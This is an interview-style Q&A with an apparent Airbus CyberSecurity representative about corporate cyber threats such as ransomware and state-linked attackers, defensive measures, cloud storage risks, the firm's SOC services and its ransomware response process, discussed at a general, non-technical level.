From a cyber security perspective - what are the biggest threats to companies, their data and their know-how?

This depends heavily on the type of company, the business model and the motivation of the potential attackers. The attacker's goal could be financial, political or even revenge. From this point of view, insider attacks should not be ruled out. Potential threats to the business model can be massive disruptions to business processes and services that directly affect production or make it impossible for the company to access its own important data. There are also other issues such as loss of intellectual property or loss of customer data, which can have a direct financial impact through fines or litigation and reputational damage.

Most sophisticated attacks still come from foreign intelligence services, but cybercriminals are a close second. In fact, the distinction between state actors and criminals is often hard to maintain, as criminal groups can act as proxies for state actors. Ransomware is still one of the biggest threats. Even though there are many other types of attacks such as phishing, cybercriminals still like to spread ransomware as widely as possible in the hope of making financial gains. Everyone should be aware of this potential risk. Other attacks also aim to exploit vulnerabilities in small and medium-sized enterprises (SMEs) in the supply chain to gain access to company systems, particularly intellectual property and commercial information. Once they have penetrated the system, cybercriminals can use administration tools such as PowerShell and WMI to continue the attack without using malware that may be detected.

To what extent can a company really protect its IT and its entire production from attacks?

To quote Benjamin Franklin: "In this world, nothing is certain except death and taxes." There are no one hundred percent guarantees. Nor is there one miracle cure. However, there are various measures that can be taken to protect companies' IT and production systems from attacks. In order to determine these, it is important to carry out a cyber risk assessment to identify the potential impact of an attack on the company and assess its risk rating. Ideally, a company balances how much it spends on defending its systems against an attack and how much it spends on monitoring to detect and then respond to a vulnerability when it occurs. The balance depends on the business risk and the available budget for cyber security. In many cases, companies will not want to change their existing systems to create better defenses. This may result in the need for extensive monitoring and, in some cases, near-continuous incident response, as the infrastructure cannot be defended due to lack of zoning, uncontrolled use of administrator rights and the absence of defenses within the system.

In general, however, around 80 to 90 percent of attacks on IT systems can be easily stopped by standard measures such as timely patching, virus protection, use of least privilege principles, vulnerability assessment and two-factor authentication for remote access and critical systems and servers. For Operational Technology (OT) systems, similar measures as well as zoning and monitoring can provide protection, but these vary depending on the system. Defensive architectures can also be used on both IT and OT systems to create a hostile environment for the attacker, slowing them down and forcing them to reveal themselves. This makes it easier to detect the attack and subsequently respond to incidents. With further measures, security can be gradually improved, but 100% protection can never be guaranteed.

Is storing your own data in an external cloud an insecurity factor?

There are always risks, but these differ between external data storage and in-house data storage. When using the cloud in particular, it is not always possible to trace where your data is physically stored. In order to comply with data protection requirements, you are dependent on the cloud provider and the contract concluded with them. On the other hand, it could be argued that data stored in the cloud is more secure because cloud providers are able to provide resilient multi-site storage and mirroring of data to keep it available in the event of a disaster, which is not always the case with on-site storage. Depending on the organization, cloud services can also provide better protection against data theft, especially for SMBs that may not have the resources to manage complex on-site security systems. However, one of the biggest risks with cloud storage is misconfiguration by the user.

Cloud services definitely have their place in the discussion, but the ability to manage security aspects is based on other aspects. This starts with the selection of the cloud provider, the agreement of the SLAs and the inclusion of clauses in the contracts that cover the required security and data protection aspects.

What services does Airbus CyberSecurity offer its customers?

We currently operate Security Operation Centers (SOCs) in Germany, France and the UK, all of which operate 24/7, and we will soon have a fourth SOC in Spain. From these SOCs, we offer managed security services for government agencies and corporate customers. These services are tailored to each country and therefore differ slightly from country to country, but include:

• Protective Monitoring
• Vulnerability Management
• Event & Incident Management and response
• Cyber Threat Intelligence & Threat Hunting
• Incident Response
• Penetration Testing

We also install SOCs directly at the customer's premises, train staff to operate them or provide our own staff to operate the SOCs on site.

We also offer consulting services such as security risk analysis and security maturity assessments for IT and OT networks and have recently announced the addition of OT monitoring to offer our customers combined IT/OT SOC services.

What were the most unusual cyber attacks that you personally experienced?

I wouldn't say that I've personally seen any particularly unusual attacks. We are mainly seeing constant scanning for remote code execution vulnerabilities. There has also been a rise in the use of scripting techniques for persistence and lateral movement, coupled with "living off the land" techniques from attackers using legitimate binaries to download or execute payloads. This can be a challenge as there is usually no detectable malware.

Wannacry also introduced the concept of "wormable" ransomware (although some viruses had this before). This type of threat continues to evolve, for example with the recent "BlueKeep" vulnerability.

How do you react to active attacks or blackmail - for example through ransomware? And how often does this happen?

In the event of an active ransomware attack, we would invoke our Major Incident Management process and isolate the spread of the attack by adding signatures or blocking ports on IPSs and updating firewall rules. While this requires a quick response, it has been successful, as we have proven in the past with wormable malware.

The monitoring in our SOCs shows daily ransomware attempts among our customer base. All attempts to download or execute malicious ransomware payloads are detected and blocked. We also conduct threat intelligence to identify new ransomware campaigns and deploy signatures gained from this information to SOC toolsets so that we have effective protection in place before our customer networks can be infected.